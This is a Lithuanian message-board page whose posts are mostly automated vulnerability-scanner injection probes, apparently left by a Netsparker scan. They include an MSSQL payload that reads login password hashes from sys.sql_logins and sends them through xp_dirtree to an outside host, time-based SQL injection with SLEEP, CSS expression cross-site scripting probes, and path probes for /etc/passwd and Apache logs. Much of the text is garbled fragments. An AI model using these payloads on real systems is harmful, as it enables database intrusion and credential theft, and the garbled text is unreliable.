Rasyti Refresh I pagrindini

» : declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.vadkeamaoxplzmibiedsfgetmhjutked5gmq3g2b'+'pta.r87.me' from sys.sql_logins WHERE principal_id=1;exec('xp_dirtree ''\\'+@h+'\c$$''')
» gethostbynametrimvadkeamaoxwtmkteanf8mvebpzjznbn4tdnoahb4oiwr87me: 3
» 127001elmah: 3
» : '+netsparker(0x010C0C)+'
» mith: exec('xp_dirtree ''\\vadkeamaoxqrr5qg8paomhrxhggblf8xb6o8uy1e'+'cek.r87.me'+'\c$$\a''')
» etcpasswd: 3
» mith: */netsparker(0x010C0B) ss *
» : exec('xp_dirtree ''\\vadkeamaoxfcslvzk-bovdmuskq7y-ttydpuddna'+'qr8.r87.me'+'\c$$\a''')
» gethostbynametrimvadkeamaoxm6fn0etkaxxfv9vbchxhgx75apdpaw4sr87me: 3
» 1elmah: 3
» userselectchr118chr97chr100chr107chr101chr97chr109chr97chr111chr120chr117chr101chr116chr119chr105chr114chr45chr102chr117chr117chr105chr111chr119chr106chr98chr103chr55chr108chr117chr98chr122chr119chr110chr45chr116chr110chr51chr97chr105chr55chr104chr118chr101chr46chr114chr56chr55chr46chr109chr101from: 3
» : */netsparker(0x010C0A) ss *
» procversion0php: 3
» mith: body{x:expression(netsparker(0x010C09))}
» gethostbynametrimvadkeamaoxiu3ybrhomy539phscpkgu1qoycud9a0r87me: 3
» lengthuserselectchr118chr97chr100chr107chr101chr97chr109chr97chr111chr120chr113chr119chr114chr106chr109chr51chr121chr95chr120chr54chr101chr105chr103chr114chr111chr116chr54chr103chr95chr101chr110chr114chr113chr114chr109chr122chr45chr111chr52chr54chr102chr101chr107chr46chr114chr56chr55chr46chr109chr101from: 3
» 127100112elmah: 3
» : body{x:expression(netsparker(0x010C0 ss )}
» mith: -1" or 1 ss (SELECT 1 FROM (SELECT SLEEP(25))A))+"
» procversion: 3
» gethostbynametrimvadkeamaoxnd4hvmpli3nucp9gkfuxhlpwtewe2hyr87me: 3
» mith: n;ns:expression(netsparker(0x010C07));
» selectchr118chr97chr100chr107chr101chr97chr109chr97chr111chr120chr100chr97chr97chr109chr54chr121chr101chr52chr101chr99chr97chr105chr120chr53chr95chr113chr121chr113chr57chr119chr116chr56chr56chr116chr119chr55chr97chr110chr120chr112chr49chr54chr99chr46chr114chr56chr55chr46chr109chr101from: 3
» : -1" or 1 ss (SELECT 1 FROM (SELECT SLEEP(25))A))+"
» 10923568224elmah: 3
» : n;ns:expression(netsparker(0x010C06));
» gethostbynametrimvadkeamaox7lvr2ydrl8ef3fngqf79yuoj5bnyefwcer87me: 3
» mith: -1 or 1 ss (SELECT 1 FROM (SELECT SLEEP(25))A))
» varlogapacheerrorlog: 3
» : -1 or 1 ss (SELECT 1 FROM (SELECT SLEEP(25))A))

[1][2][3][4][5][6][7][8][9][10][11][12][13][14][15][16][17][18][19][20][21][22][23][24][25][26][27][28][29][30][31][32][33][34][35][36]

---
Zinuciu: 1054